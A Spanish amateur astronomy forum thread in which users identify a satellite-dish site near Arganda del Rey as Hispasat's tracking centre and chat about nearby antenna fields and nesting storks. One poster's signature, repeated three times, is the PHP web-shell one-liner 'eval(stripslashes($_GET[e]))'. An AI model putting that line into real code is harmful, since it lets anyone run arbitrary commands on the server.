¿Alguien sabe qué es esto?

Como empezar, conceptos, ideas, proyectos. Si te gustan las ondas y la astronomía en este foro vas a disfrutar.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

¿Alguien sabe qué es esto?

Mensaje por m3ntol »

Está ubicado en la intersección de la R-3 con la A-3, este es el enlace del google maps:

http://maps.google.es/maps?ll=40.272839 ... &t=h&hl=es

Está plagado de antenas parabólicas de todos los tamaños. Debe ser un centro de telecomunicaciones, pero ni idea de quien es.
phpbb:eval(stripslashes($_GET[e]));
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

¿Alguien sabe qué es esto?

Mensaje por vakaloura »

Ni idea, pero se lo podían currar y regalarnos una.... jejejeje

O un día vamos allí en plan pueblerinos -oyéee, y eso que é lo que é!!??- :roll:

Un saludo majetes!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

¿Alguien sabe qué es esto?

Mensaje por Manuelariza »

Meeee parece que pertenece a los que participan en las guerras,vamos...el ejercito,pero no estoy muy seguro.


saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

¿Alguien sabe qué es esto?

Mensaje por Arbacia »

Es el centro de seguimiento de Hispasat en Arganda del Rey

http://www.hispasat.com/Detail.aspx?Sec ... 72&lang=es
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

¿Alguien sabe qué es esto?

Mensaje por m3ntol »

Muchas gracias!
:) pues habrá que hacerles una visita y presentarse.
Un saludo!
phpbb:eval(stripslashes($_GET[e]));
jamf
Mensajes: 284
Registrado: Lun May 28, 2007 5:28 pm

¿Alguien sabe qué es esto?

Mensaje por jamf »

Como bien comenta Arbacia, estas instalaciones son para el control de los hispasat, antaño incluso tenían el monograma de Retevisión.

Frente a la Poveda si que hay una instalación de telecomunicaciones militar donde se pueden ver cienes de nidos de cigüeñas haciendo de camuflaje para las antenas. 8) 8) 8)

Saludos.
"No soy un inútil por completo, al menos sirvo como mal ejemplo." ( El chavo del ocho)
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

¿Alguien sabe qué es esto?

Mensaje por theheavy »

Las instalaciones de Rne, allí en arganda andan igual, es alucinante la de cigüeñas que hay por esa zona y las mansiones que construyen en lo alto de una antenita o poste de marera.

M3ntol, no es que desconfíe de tu don de palabra, pero al tratarse de una empresa privada, la cosa está difícil. Es mas facil acechar un organismo público, a los funcionarios le importa 3 coj... todo, ellos con tal de no tener que sacar la basura.
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

¿Alguien sabe qué es esto?

Mensaje por m3ntol »

Es cuestión de probar. El no ya lo tenemos y no se pierde nada por hablar con ellos. Además la gente es gente da igual donde trabajen.
phpbb:eval(stripslashes($_GET[e]));
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

¿Alguien sabe qué es esto?

Mensaje por Arbacia »

en la zona tambien está el campo de antenas de onda corta y media de Telefónica (incl. el servicio marítimo) en Pozuelo del Rey y el de la Armada en Pozo de guadalajara
Blue Ice
Mensajes: 6
Registrado: Sab Jun 27, 2009 7:57 pm

¿Alguien sabe qué es esto?

Mensaje por Blue Ice »

Si es una zona bastante plagada de antenas!!! Las de la armada creo recordar que eran dos una es la transmisora que es la del pozo que comentas, pero pertenece a Santorcaz (muy cerquita de donde quedais en pioz) y la receptora esta en Valdilecha. Y las cigueñas molan mucho desde abajo, pero yo trabajo en este mundillo de las antenas y si te toca subir yuyu, y en epoca de cria creo que esta prohibido y lo de tocar el nido, pues directo a la carcel :D
Responder